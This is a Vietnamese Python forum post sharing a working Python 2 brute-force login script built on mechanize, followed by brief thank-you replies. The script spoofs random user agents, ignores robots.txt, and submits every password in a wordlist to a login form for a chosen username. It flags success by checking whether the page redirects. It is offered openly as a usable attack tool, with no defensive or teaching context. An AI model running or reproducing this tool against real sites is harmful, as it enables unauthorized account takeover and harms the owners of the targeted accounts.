Code Python Brute-Force • Các bạn cần tải bổ sung và cài đặt module mechanize nhé
  Video tại :https://www.youtube.com/watch?v=xYnOqbxIZd4

  #code by tuanmerino
  #website test : tuanmerino.ga
  import mechanize
  import cookielib
  import random
  import sys
  useragents = [
  				 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
  				 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
  				 "Googlebot/2.1 (http://www.googlebot.com/bot.html)",
  				 "Opera/9.20 (Windows NT 6.0; U; en)",
  				 "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)",
  				 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)",
  				 "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0",
  				 "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
  				 "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", # maybe not
  				 "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13",
  				 "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)",
  				 "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
  				 "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
  				 "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)",
  				 "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)",
  				 "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8",
  				 "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
  				 "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
  				 "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
  				 "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)"
  ]
  br = mechanize.Browser()
  br.addheaders = [('User-agent', random.choice(useragents))]
  br.set_handle_redirect(True)
  br.set_handle_robots(False)
  while 1:
  	print"""
   __ )       |        _|           
   __ \  __| |  | __| _ \    |  _ \  __| __| _ \ 
   |  | |  |  | |  __/_____| __| (  | |  (   __/ 
  ____/ _|  \__,_|\__|\___|   _| \___/ _| \___|\___| by tuanmerino
  		www.facebook.com/tuanmerino.FP                 """	
  	url =raw_input('Page login: ')
  	user=raw_input('User: ')
  	in_file = open(raw_input("List password: "),"r")
  	pwdf = in_file.read()
  	in_file.close()
  	listpwd = pwdf.split('\n')
  	for i in xrange(len(listpwd)):
  		br.open(url)
  		br.select_form(nr=0)
  		br["Username"]=user
  		br["Password"] = listpwd[i]
  		br.submit()
  		a=br.geturl()
  		if a ==url:
  			print 'Redirect link: '+ str(a) +" pass: "+str(listpwd[i])+ " False"
  		else:
  			print'Redirect link: '+ str(a) +" pass: "+str(listpwd[i])+ " True"
  #			sys.exit()```

 • administrators

  Em trình bày source trên trang luôn nhé. • vâng e edit bài rồi :D • cảm ơn bạn nhiều • @BrianEdgar
  Không có gì bạn
  Nếu có lỗi hay sai sót khi dùng code bạn liên hệ fb https://www.facebook.com/tuanmerino.FP nhé


Hãy đăng nhập để trả lời
 

Có vẻ như bạn đã mất kết nối tới Cộng đồng Python Việt Nam, vui lòng đợi một lúc để chúng tôi thử kết nối lại.